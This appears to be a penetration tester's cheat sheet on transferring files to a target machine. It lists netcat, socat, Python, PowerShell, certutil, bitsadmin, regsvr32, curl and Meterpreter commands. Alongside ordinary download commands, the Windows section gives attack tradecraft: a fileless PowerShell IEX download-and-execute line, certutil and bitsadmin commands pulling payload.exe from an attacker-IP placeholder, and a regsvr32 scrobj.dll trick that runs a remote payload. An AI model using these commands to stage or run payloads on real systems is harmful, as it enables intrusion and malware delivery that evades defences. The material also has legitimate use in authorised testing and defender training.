File Transfers
Download Files to Target
===================
NETCAT
===================
On Receiving End
nc -l -p 1234 > out.file
On Sending End
nc -w 3 [destination] 1234 < out.file
OR
On Receving End
nc -l -p 1234 | uncompress -c | tar xvfp -
On Sending End
tar cfp - /some/dir | compress -c | nc -w 3 [destination] 1234
===================
SOCAT
===================
On Server Sending File Do
socat -u FILE:test.dat TCP-LISTEN:9876,reuseaddr
On Client Receiving File Do
socat -u TCP:127.0.0.1:9876 OPEN:out.dat,creat
OR
On Server Receving File Do
socat -u TCP-LISTEN:9876,reuseaddr OPEN:out.txt,creat && cat out.txt
On Client Sending File Do
socat -u FILE:test.txt TCP:127.0.0.1:9876
=======================
PYTHON3
=======================
URLLIB REQUEST MODULE
import urllib.request
print('Beginning file download with urllib2...')
url = '<url>/<uriToFile>'
urllib.request.urlretrieve(url, '/Users/tobor/Downloads/<filename.txt>')
OR
URLLIB2 MODULE
import urllib2
filedata = urllib2.urlopen('<url>/<uriToFile>')
datatowrite = filedata.read()
with open('/Users/tobor/Downloads/file.txt', 'wb') as f:
f.write(datatowrite)
OR
REQUESTS MODULE
import requests
print('Beginning file download with requests')
url = '<url>/<uriToFile>'
r = requests.get(url)
with open('/Users/tobor/Downloads/file.txt', 'wb') as f:
f.write(r.content)
# Retrieve HTTP meta-data
print(r.status_code)
print(r.headers['content-type'])
print(r.encoding)
OR
WGET MODULE
import wget
print('Beginning file download with wget module')
url = '<url>/<uriToFile>'
wget.download(url, '/Users/tobor/Downloads/file.txt')
====================
WINDOWS
====================
PowerCat:
Send File:
powercat -c 10.1.1.1 -p 443 -i C:\inputfile
Recieve File:
powercat -l -p 8000 -of C:\inputfile
Download Powershell Script and Execute Without Touching Disk:
IEX(New-Object Net.WebClient).downloadString('<url>/<payload>') ;<methodName>
Download To File:
Invoke-WebRequest "http://<ip>:<port>/<in file>" -OutFile "<out file>"
Download File With PowerShell
Start-BitsTransfer http://<attackerip>:<port>/<payload> -Destinations C:\Path\To\Save\File.ps1
Download File With Command Prompt
certutil.exe -urlcache -split -f http://<attackMachineIP>:<port>/Payload.exe C:\Path\To\Save\File
Download File With BitsAdmin
bitsadmin /transfer debjob /download /priority normal <url> <pathToSaveTo>
OR
bitsadmin /create /download <JobName>
bitsadmin /addFile <JobName> http://<attackerip>:<port>/payload.exe C:\Path\To\Download\To.txt
bitsadmin /setproxysettings <JobName> OVERRIDE proxy1:80 "<local>"
bitsadmin /resume <JobName>
bitsadmin /monitor
bitsadmin /complete <JobName>
Download and Execute File Using RegSVR
regsvr32 /s /n /u /i:<url>:<port>/<payload> scrobj.dll
====================
LINUX
====================
WGET
wget -O <Preferred_FileName> <url>
CURL
Curl To Download File
curl -o output.file <url>/<uritoFile>
curl -O <uritoFile>
curl --remote-name <url>/<uritoFile>
curl -u Username:Password <url>/<uritoFile>
Curl to Download Multiple Files
curl -O <url>/<uritoFile> -O <url>/<uritoFile>
Curl To Download Web Page
curl -o nixcraft.html <url>/<uritoFile>
Curl to Download From SSH Server
curl -u username sftp://server1.cyberciti.biz/path/to/file.txt
OR
curl -u username: --key ~/.ssh/id_rsa --pubkey ~/.ssh/id_rsa.pub
Curl to Download From FTP Server
curl ftp://username:passwordd@<domain.com>:21/path/to/backup.tar.gz
METERPRETER
download -f <pathToFile> <SaveFileLocation>